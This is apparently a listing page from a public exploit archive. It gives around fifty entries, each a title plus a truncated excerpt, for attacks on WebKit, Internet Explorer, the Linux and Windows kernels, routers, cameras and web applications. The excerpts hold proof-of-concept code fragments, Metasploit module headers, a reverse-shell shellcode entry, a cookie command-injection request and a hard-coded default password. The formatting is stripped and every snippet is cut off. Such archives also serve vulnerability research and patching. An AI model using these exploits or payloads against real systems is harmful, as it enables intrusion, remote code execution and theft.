WebKit JSC - 'DFG::ByteCodeParser::flush(InlineStackEntry* inlineStackEntry)' Incorrect Scope Register Handling

scopeRegister; mcodeBlock| instead of |mcodeBlock|. But it doesn't. As a result, the scope register of |inlineStackEntry-mcodeBlock| may have an incorrect offset in the stack layout phase. PoC: -- function f function eval'1'; f; ; throw 1; f;...

WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting

let f = document.body.appendChilddocument.createElement'iframe'; let loc = f.contentWindow.location; f.onload = = let a = 1.2; a.proto.proto = f.contentWindow; a'test' = toString: function arguments.callee.caller.constructor'alertlocation'; ; ; f.src = 'data:text/html,' +...

vBulletin 5.1.2 < 5.1.9 - Unserialize Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'vBulletin 5.1.2 Unserialize Code Execution', 'Description' = %q This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to...

Linux Kernel - 'BadIRET' Local Privilege Escalation

CVE-2014-9322 PoC for Linux kernel CVE-2014-9322 a.k.a BadIRET proof of concept for Linux kernel. This PoC uses only syscalls not any libraries, like pthread. Threads are implemented using raw Linux syscalls. Raw Linux Threads via System Calls Usage $ make badiret.elf is an ELF executable...

REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution

Advisory: Remote Command Execution as root in REDDOXX Appliance RedTeam Pentesting discovered a remote command execution vulnerability in the REDDOXX appliance software, which allows attackers to execute arbitrary command with root privileges while unauthenticated. Details ======= Product: REDDOX...

IPFire < 2.19 Update Core 110 - Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'IPFire proxy.cgi RCE', 'Description' = %q IPFire, a free linux based open source firewall distribution, version 'h00die ', module '0x09AL'...

VICIdial 2.9 RC 1 < 2.13 RC1 - 'user_authorization' Command Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'VICIdial userauthorization Unauthenticated Command Execution', 'Description' = %q This module exploits a vulnerability in VICIdial versions 2.9 R...

Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)

.class1 float: left; column-count: 5; .class2 column-span: all; columns: 1px; table border-spacing: 0px; var baseleakedaddr = ""; function infoleak var textarea = document.getElementById"textarea"; var frame = document.createElement"iframe"; textarea.appendChildframe;...

WebKit - 'WebCore::Node::nextSibling' Use-After-Free

function freememory var a; forvar i=0;i !-- ================================================================= ASan log: ================================================================= ==29516==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000b7070 at pc 0x0001111c843b bp...

CenturyLink ZyXEL PK5001Z Router - Root Remote Code Execution

/ PK5001Z CenturyLink Router/Modem remote root exploit / / oxagast / Marshall Whittaker / / marshall@likon:/Code/pk5001zpwn: gcc pk5001z00pin.c -o pk5001z00pin / / marshall@likon:/Code/pk5001zpwn: ./pk5001z00pin / / PK5001Z CenturyLink Router remote root 0day / / Enjoy! / / --oxagast / /...

Razer Synapse 2.20.15.1104 - rzpnk.sys ZwOpenProcess (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/exploit/local/windowskernel' require 'rex' require 'metasm' class MetasploitModule 'Razer Synapse rzpnk.sys ZwOpenProcess', 'Description' = %q A...

WebKit - 'WebCore::AccessibilityRenderObject::handleAriaExpandedChanged' Use-After-Free

div visibility: collapse function eventhandler document.execCommand"bold", false; img.style.removeProperty"-webkit-appearance"; img.setAttribute"aria-expanded", "false"; aaa !-- ================================================================= ASan log:...

WebKit - 'WebCore::getCachedWrapper' Use-After-Free

function freememory var a; forvar i=0;i ::get const /Users/projectzero/web...

WebKit - 'WebCore::RenderObject' with Accessibility Enabled Use-After-Free

link text-transform: lowercase; link::first-letter border-spacing: 1em; function go dt.appendChildlink; var s = link.style; s.setProperty"display", "table-column-group"; s.setProperty"-webkit-appearance", "menulist-button"; function eventhandler dir.setAttribute"aria-labeledby", "meta";...

WebKit - 'WebCore::InputType::element' Use-After-Free (1)

var runcount = 0; function go runcount++; ifruncount 2 return; i.type = "foo"; i.select; i.type = "search"; document.onsearch = document.body.onload; document.execCommand"insertHTML", false, ""; !-- ================================================================= ASan log:...

Nitro Pro PDF - Multiple Vulnerabilities

Vulnerabilities Summary The following advisory describes three vulnerabilities found in Nitro / Nitro Pro PDF. Nitro Pro is the PDF reader and editor that does everything you will ever need to do with PDF files. The powerful but snappy editor lets you change PDF documents with ease, and comes wit...

REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure

Advisory: Arbitrary File Disclosure with root Privileges via RdxEngine-API in REDDOXX Appliance RedTeam Pentesting discovered an arbitrary file disclosure vulnerability in the REDDOXX appliance software, which allows unauthenticated attackers to list directory contents and download arbitrary file...

WebKit - 'WebCore::Node::getFlag' Use-After-Free

-webkit-flow-into: textarea; function freememory var a; forvar i=0;i foo !-- ================================================================= ASan log: ================================================================= ==29717==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000053b3...

WebKit - 'WebCore::RenderSearchField::addSearchResult' Heap Buffer Overflow

function go i.value = "1"; i.type = "search"; f.submit; ::buffer /Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x8664+0x2694d46 1 0x116496bed in WTF::Vector::end...

WebKit - 'WebCore::AccessibilityNodeObject::textUnderElement' Use-After-Free

function go li.hidden = true; dir.setAttribute"aria-labeledby", "map"; !-- ================================================================= ASan log: ================================================================= ==728==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000908a0 at...

PaulShop - SQL Injection / Cross-Site Scripting

Exploit Title: PaulShop CMS - Sql Injection and stored XSS Date: 07/23/2017 Exploit Author: BTIS Team http://www.btis.vn Vendor Homepage: https://codecanyon.net/item/paulshop-cms-with-shopping-cart-system/18070714 Version: 03/27/2017 Tested on: Apache/2.4.7 Ubuntu Contact: [email protected] Can no...

MAWK 1.3.3-17 - Local Buffer Overflow

!/usr/bin/python Developed using Exploit Pack - http://exploitpack.com - Exploit Author: Juan Sacco at KPN Red Team - http://www.kpn.com Tested on: GNU/Linux - Kali 2017.1 Release Description: MAWK AWK Interpreter 1.3.3-17 and prior is prone to a stack-based buffer overflow vulnerability because...

ManageEngine Desktop Central 10 Build 100087 - Remote Code Execution (Metasploit)

Exploit Title: ManageEngine Desktop Central 10 Build 100087 RCE Date: 24-07-2017 Software Link: https://www.manageengine.com/products/desktop-central/ Exploit Author: Kacper Szurek Contact: https://twitter.com/KacperSzurek Website: https://security.szurek.pl/ CVE: CVE-2017-11346 Category: remote ...

NEC UNIVERGE UM4730 < 11.8 - SQL Injection

Exploit Title: NEC UNIVERGE UM4730 11.8 SQL injection Vulnerbility: SQL injection login bypass Date: 15-12-2016 Exploit Author: b0x41s Author web: https://www.xrayit.nl Vendor Homepage: https://www.nec-enterprise.com Category: webapps Version: 11.6.0.31 Tested on: Windows server 2008 Description:...

Joomla! Component JoomRecipe 1.0.4 - 'search_author' SQL Injection

Exploit Title: Joomla JoomRecipe 1.0.4 Component - Blind SQL Injection Vulnerability Date: 20.07.2017 Exploit Author: Teng Vendor Homepage: http://joomboost.com/ Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/joomrecipe/ Version: 1.0.4 Platform:...

Virtual Postage (VPA) - Man In The Middle Remote Code Execution

Exploit Title: Virtual Postage VPA - Remote Code Execution via MITM Date: 20/Jul/17 Exploit Author: MaXe Vendor Homepage: https://play.google.com/store/apps/details?id=a2.virtualpostage.com http://archive.is/EdtJT Software Link: N/A Screenshot: N/A Version: 1.0 Tested on: Android 4.1.0 Google API...

WordPress Plugin IBPS Online Exam 1.0 - SQL Injection / Cross-Site Scripting

Exploit Title: IBPS Online Exam Plugin for WordPress v1.0 - XSS SQLi Date: 2017-07-11 Exploit Author: 8bitsec Vendor Homepage: https://elfemo.com/demo/server2/order2032/ Software Link: https://codecanyon.net/item/ibps-online-exam-plugin-for-wordpress/20028534 Version: 1.0 Tested on: Kali Linux 2....

Docker Daemon - Unprotected TCP Socket

Exploit Title: Docker Daemon - Unprotected TCP Socket Date: 20-07-2017 Exploit Author: Martin Pizala Vendor Homepage: https://www.docker.com Software Link: https://www.docker.com/get-docker Version: Since 0.4.7 2013-06-28 feature: mount host directories Tested on: Docker CE 17.06.0-ce and Docker...

SKILLS.com.au Industry App - Man In The Middle Remote Code Execution

Exploit Title: SKILLS.com.au Industry App - Remote Code Execution via MITM Date: 20/Jul/17 Exploit Author: MaXe Vendor Homepage: https://play.google.com/store/apps/details?id=a3.skills.com http://archive.is/NRlNP Software Link: N/A Screenshot: N/A Version: 1.0 Tested on: Android 4.1.0 Google APIs...

Tilde CMS 1.01 - Multiple Vulnerabilities

Exploit Title: Tilde CMS 1.01 Multiple Vulnerabilities Date: July 7th, 2017 Exploit Authors: Paolo Forte, Raffaele Forte Vendor Homepage: http://www.tildenetwork.com/ Version: Tilde CMS 1.0.1 Tested on: Ubuntu 12.04, PHP 5.3.10 I. INTRODUCTION...

VACRON VIG-US731VE 1.0.18-09-B727 IP Camera - Authentication Bypass

Exploit Title: IP Camera VACRON VIG-US731VE Date: 2017-07-18 Exploit Author: anonymous Vendor Homepage: www.vacron.com Version: V1.0.18-09-B727 1. doesn't require credentials to fetch snapshot like this: http://192.168.0.200/ipcam/jpeg 2. allows "viewer" level user to fetch any camera setting, eg...

Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)

Exploit Title: Citix SD-WAN logout cookie preauth Remote Command Injection Vulnerablity Date: 02/20/2017 Exploit Author: xort @ Critical Start Vendor Homepage: www.citrix.com Software Link: https://www.citrix.com/downloads/cloudbridge/ Version: 9.1.2.26.561201 Tested on: 9.1.2.26.561201 OS...

Linux/x86_64 - Reverse Shell (192.168.1.8:4444) Shellcode (104 bytes)

Linux/x8664 - Reverse Shell 192.168.1.8:4444 Shellcode 104 bytes. Shellcode exploit for Linx86-64 platform / ;Category: Shellcode ;Title: GNU/Linux x8664 - Reverse Shell Shellcode ;Author: m4n3dw0lf ;Github: https://github.com/m4n3dw0lf ;Date: 18/07/2017 ;Architecture: Linux x8664 ;Tested on: 1 S...

Sonicwall < 8.1.0.2-14sv - 'sitecustomization.cgi' Command Injection (Metasploit)

Exploit Title: Sonicwall importlogo/sitecustomization CGI Remote Command Injection Vulnerablity Date: 12/25/2016 Exploit Author: xort @ Critical Start Vendor Homepage: www.sonicwall.com Software Link: sonicwall.com/products/sra-virtual-appliance Version: 8.1.0.2-14sv Tested on: 8.1.0.2-14sv CVE :...

Sonicwall Secure Remote Access 8.1.0.2-14sv - Command Injection

Sonicwall Secure Remote Access SRA - Command Injection Vulnerabilities Vendor: Sonicwall Dell Product: Secure Remote Access SRA Version: 8.1.0.2-14sv Platform: Embedded Linux Discovery: Russell Sanford of Critical Start www.CriticalStart.com CVE: cve-2016-9682 Tested against version 8.1.0.2-14sv ...

Microsoft Windows 7 SP1 (x86) - GDI Palette Objects Local Privilege Escalation (MS17-017)

E-DB Note: + Source: https://github.com/sensepost/gdi-palettes-exp + Binary: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42432.exe include include include include //From http://stackoverflow.com/a/26414236 this defines the details of the NtAllocateVirtualMemor...

Oracle E-Business Suite 12.x - Server-Side Request Forgery

Exploit Title: Oracle E-Business Suite - Server Side Request Forgery Date: 19 July 2017 Exploit Author: Sarath Nair aka AceNeon13 Contact: @AceNeon13 Greetings: Raj3sh.tv, Deepu.tv Vendor Homepage: www.oracle.com Software Link:...

Citrix CloudBridge - 'CAKEPHP' Cookie Command Injection

POST /cgi-bin/login.cgi?redirect=/ HTTP/1.1 Host: 10.242.129.149 Accept: / Accept-Language: en User-Agent: Mozilla/5.0 compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0 Connection: close Referer: https://10.242.129.149/cgi-bin/login.cgi?redirect=/ Cookie: CAKEPHP=sleep 10 Content-Type...

Sonicwall < 8.1.0.6-21sv - 'gencsr.cgi' Command Injection (Metasploit)

Exploit Title: Sonicwall gencsr CGI Remote Command Injection Vulnerablity Date: 12/24/2016 Exploit Author: xort @ Critical Start Vendor Homepage: www.sonicwall.com Software Link: sonicwall.com/products/sra-virtual-appliance Version: 8.1.0.6-21sv Tested on: 8.1.0.2-14sv CVE : awaiting cve vuln:...

Barracuda Load Balancer Firmware < 6.0.1.006 - Remote Command Injection (Metasploit)

Exploit Title: Barracuda Load Balancer Firmware 'Barracuda Load Balancer Firmware %q This module exploits a remote command execution vulnerability in the Barracuda Load Balancer Firmware Version = v6.0.1.006 2016-08-19 by exploiting a vulnerability in the web administration interface. By sending ...

Microsoft Internet Explorer 11.1066.14393.0 - VBScript Arithmetic Functions Type Confusion

PvarGetArithVal; VAR arithv2 = v2-PvarGetArithVal; int resulttype = resultlookuptablev1-vartypev2-vartype; ifresulttype == 10 RaiseError...; ifresulttype == 2 ... else ifresulttype == 3 ... else ifresulttype == 4 ... v1-vartype = resulttype; where the logic for VAR::PvarGetArithVal is roughly VAR...

Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)

Exploit Title: Sophos Web Appliance reporting JSON trafficType Remote Command Injection Vulnerablity Date: 01/28/2017 Exploit Author: xort @ Critical Start Vendor Homepage: www.sophos.com Software Link: sophos.com/en-us/products/secure-web-gateway.aspx Version: 4.3.0.2 Tested on: 4.3.0.2 CVE :...

PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting

Summary ======= 1. Missing access control CVE-2017-11356 2. Multiple cross-site scripting CVE-2017-11355 Vendor ====== "Pegasystems Inc. is the leader in software for customer engagement and operational excellence. Pega’s adaptive, cloud-architected software – built on its unified Pega® Platform ...

Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Privilege Escalation

I'm a big fan of Hashicorp but this is an awful bug to have in software of their calibre. Their vagrant plugin for vmware fusion uses a product called Ruby Encoder to protect their proprietary ruby code. It does this by turning the ruby code into bytecode and executing it directly. Unfortunately...

Microsoft Windows Kernel - 'IOCTL 0x120007 NsiGetParameter' nsiproxy/netio Pool Memory Disclosure

/ We have discovered that the handler of the 0x120007 IOCTL in nsiproxy.sys \.\Nsi device discloses portions of uninitialized pool memory to user-mode clients, likely due to output structure alignment holes. On our test Windows 7 32-bit workstation, an example layout of the output buffer is as...

Microsoft Internet Explorer 11.0.9600.18617 - 'CMarkup::DestroySplayTree' Memory Corruption

element. The bug was confirmed on IE Version 11.0.9600.18617 Update Version 11.0.40 running on Windows 7 64-bit. I was unable to reproduce it on Windows 10. PoC: ========================================== -- function go setTimeout"window.location.reload",100;...

Belkin F7D7601 NetCam - Multiple Vulnerabilities

Exploit Title: Belkin NetCam F7D7601 | Remote Command Execution Date: 17/07/17 Exploit Author: Wadeek Vendor Homepage: http://www.belkin.com/ Tested on: Belkin NetCam F7D7601 WeMoNetCamWW2.00.10684.PVT ================================================ UnsetupMode == 0 Hard-coded password admin:adm...

Orangescrum 1.6.1 - Multiple Vulnerabilities

Exploit Title: Orangescrum 1.6.1 Multiple Vulnerabilities Google Dork: NA Date: July 9 2017 Exploit Author: [email protected] Author blog : cupuzone.wordpress.com Vendor Homepage: https://www.orangescrum.org/ Software Link: https://www.orangescrum.org/free-download Version: 1.6.1 Tested on:...

Geneko Routers - Path Traversal

Vulnerability Summary The following advisory describes a Unauthenticated Path Traversal vulnerability found in Geneko GWR routers series. Geneko GWG is compact and cost effective communications solution that provides cellular capabilities for fixed and mobile applications such as data acquisition...

Apple Mac OS X + Safari - Local Javascript Quarantine Bypass

Title: Mac OS X Local Javascript Quarantine Bypass Product: Mac OS X Version: 10.12, 10.11, 10.10 and probably prior Vendor: apple.com Type: DOM Based XSS Risk level: 3 / 5 Credits: [email protected] CVE: N/A Vendor notification: 2017-07-15 Vendor fix: 2017-09-25 Public...